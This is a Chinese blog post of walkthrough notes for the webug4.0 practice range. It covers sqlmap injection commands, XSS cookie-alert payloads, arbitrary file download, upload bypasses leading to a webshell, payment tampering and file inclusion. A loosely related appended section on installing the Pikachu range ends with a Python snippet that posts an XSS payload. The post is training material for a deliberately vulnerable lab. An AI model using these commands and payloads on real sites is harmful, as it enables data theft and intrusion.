webug4.0靶场通关笔记


注入

显错注入

随便加个符号,直接就爆出了SQL语句和闭合方式
在这里插入图片描述
很明显参数id存在sql注入,上sqlmap,这里是登录后才能打开这个网页,直接把数据包保存至kali桌面,数据包保存为1.txt

爆数据库,爆表
sqlmap -r 1.txt --dbs  
sqlmap -r 1.txt -D webug --tables    

在这里插入图片描述
在这里插入图片描述

爆字段
sqlmap -r 1.txt -D webug -T flag --cloumns 

在这里插入图片描述

查看flag
sqlmap -r 1.txt -D webug -T flag -C flag --dump 

在这里插入图片描述

布尔注入

打开靶场地址,把id参数改为-1,发现跟1比起来,内容缩短了一些,回显不一样
在这里插入图片描述
保存数据包到sqlmap跑一下,跟上关差不多,因为用到是基于时间的盲注,所以会很费时间
在这里插入图片描述

sqlmap -r 1.txt --dump -D webug -T flag -C flag  

在这里插入图片描述

延时注入

跟上个一样,很费时间

post注入

搜索框输入1’ 会报错,注入点在这
在这里插入图片描述
猜字段

1' order by 3--+
1' order by 2--+

sqlmap

sqlmap -r '1.txt' -D webug -T flag -C flag --dump

过滤注入

同上,并没有过滤

宽字节注入

xxe注入

csv注入

万能密码登陆

密码处直接填写pyload
在这里插入图片描述

XSS

反射型xss

直接在url添加pyload
在这里插入图片描述

存储型xss

留言处添加pyload,之后刷新一下网页,就弹出来了
在这里插入图片描述

DOM型xss

输入框随意输入些东西,看一下位置value=“111”
在这里插入图片描述
构造pyload,点击搜索即可

"><script>alert(document.cookie)</script><

在这里插入图片描述

过滤xss

只是过滤了script,换个就是

<img src=1 onerror=alert(document.cookie)>

在这里插入图片描述

链接注入

构造pyload,点一下直接跳转到百度

<a%20href="http://baidu.com"><h5>点我点我点我点我点我点我</h5></a>

在这里插入图片描述

任意文件下载

任意文件下载

右击下载看一下链接地址
在这里插入图片描述

http://192.168.0.130/webug/control/filedownload/file_download.php?file=template/assets/img/1.txt

看到file协议使用不当就可能会造成任意文件下载,这里构造pyload试一下

file=/index.php

果然下载成功
在这里插入图片描述

mysql配置文件下载

上传漏洞

文件上传(前端拦截)

F12可以看到对上传的文件进行了后缀限制
在这里插入图片描述
把shell后缀改成png格式,抓包,在数据包中在改回php格式
在这里插入图片描述
上传成功
在这里插入图片描述
冰蝎连接成功
在这里插入图片描述

文件上传(解析漏洞)

这里我试了空格或者“.”绕过,::$DATA绕过,双后缀名绕过,%00截断但是都不可以,这里可以使用生僻字进行绕过,比如这个 龘(dá),在repeater里面将文件名改为 shell.php龘.jpg,发现上传成功,这是因为他无法对这个字进行编码,所以后面的信息全部被过滤掉了。最后就变成了php文件,人家是成功了,但我还是不行
在这里插入图片描述

文件上传(畸形文件)

双写绕过
在这里插入图片描述

文件上传(截断上传)

人家的,我依然不可以

文件上传(htaccess)

代码有问题,跳过

逻辑漏洞

越权修改密码

万能密码
在这里插入图片描述

支付漏洞

直接价格改成-1
在这里插入图片描述
这就成功了,离谱

在这里插入图片描述

邮箱轰炸

随便输入一个邮箱,因为没有任何防御措施,很可能造成邮箱轰炸,跟短信炸弹一个道理
在这里插入图片描述

越权查看admin

所谓越权就是用普通用户拥有管理员用户的权限,比如user的id=1,管理员的id=0,通过抓包修改这个参数,就可以达到越权的目的

其它

url跳转

更改url的跳转地址
在这里插入图片描述
在这里插入图片描述

文件包含

打开靶场,看到这个url,这。。。太明显了阿
在这里插入图片描述
配合一下刚刚的文件上传,直接就执行了phpinfo
在这里插入图片描述

结束

在这里插入图片描述

### Pikachu 靶场安装教程 对于希望在本地环境中搭建并运行Pikachu靶场的人来说,可以从浏览器下载链接`https://codeload.github.com/zhuifengshaonianhanlu/pikachu/zip/refs/heads/master`获取项目资源[^1]。下载完成后得到的是压缩包形式的文件,需将其解压至`phpstudy_pro/WWW`目录下以便于通过PHPStudy Pro环境访问。 为了确保能够顺利部署Pikachu靶场,在完成上述操作之后还需要确认服务器配置正确无误,并启动Web服务使得可以通过浏览器访问到应用页面。通常情况下,默认端口设置为80或8086,具体取决于个人配置情况以及是否有其他服务占用这些端口号。 一旦成功部署完毕,则可以在浏览器输入框内键入类似`localhost:8086/pikachu-master/vul/xss/xssblind/admin_login.php`这样的URL来验证是否可以正常加载目标网页[^2]。 ### Pikachu 靶场通关攻略概览 针对XSS漏洞练习模块中的盲型跨站脚本攻击部分,用户应当尝试理解如何利用JavaScript代码注入技术绕过现有防护机制实现对管理员账户登录状态的操作控制。这不仅涉及到HTML标签属性值内的恶意代码嵌入技巧,还包括了对HTTP请求参数传递方式的理解与运用。 除了掌握基本概念外,实际动手实践也是不可或缺的一环。建议读者仔细阅读官方文档说明,积极参与社区交流讨论,不断积累经验教训从而提高解决问题的能力水平。 ```python # 示例Python代码用于模拟发送带有payload的有效载荷给服务器 import requests url = "http://example.com/login" data = {"username": "<script>alert('XSS')</script>", "password": ""} response = requests.post(url, data=data) print(response.text) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值